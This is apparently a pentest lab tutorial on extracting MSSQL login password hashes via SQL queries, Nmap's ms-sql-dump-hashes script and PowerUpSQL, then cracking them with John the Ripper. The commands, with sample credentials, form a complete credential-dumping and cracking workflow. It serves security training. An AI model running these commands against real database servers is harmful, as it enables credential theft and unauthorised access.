In this article, we will learn about multiple ways to get hashes of MSSQL users. Every version of MSSQL has different hashes. We have performed our practical on SQL Server 2016 version. Once we find the hashes, we will use JohnTheRipper to crack them.
Table of Content
· Introduction to Hashing in SQL server
· CLI
· Nmap
· PowerUpSQL
· JohnTheRipper
Introduction to Hashing in SQL server
A hash produced in SQL server looks somewhat like the following:
CLI
To get hashes of all the users, use the following query:
SELECT * FROM sys.sql_logins
To the hashes of a particular user, use the following query:
select name,password_hash from sys.sql_logins where name='sa'
As you can see, both the above queries have given us the desired result.
Nmap
We can also retrieve the hashes remotely using Nmap. And the command to do so is the following:
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146
And as the result of the above command, we have our hash.
PowerUpSQL
To the hashes remotely, PowerUpSQL provides a simple command which is as follows:
Import-Module .\PowerUpSQL.ps1
Get-SQLServerPasswordHash -username sa -Password Password@1 -instance WIN-P83OS778EQK\SQLEXPRESS -Verbose
These are the multiple ways to retrieve the hashes for the MSSQL server, both remotely and locally.
JohnTheRipper
Now that we have acquired the hashes, all we have to do is crack them. For this, we will use the almighty password cracker tool, i.e., JohnTheRipper. And to de-hash the password hash, use the following command:
john --format=mssql12 --wordlist=pass hash
And the result shows us that the password is Password@1 which is accurate. SO, this way, one can dump and then crack the MSSQL hashes.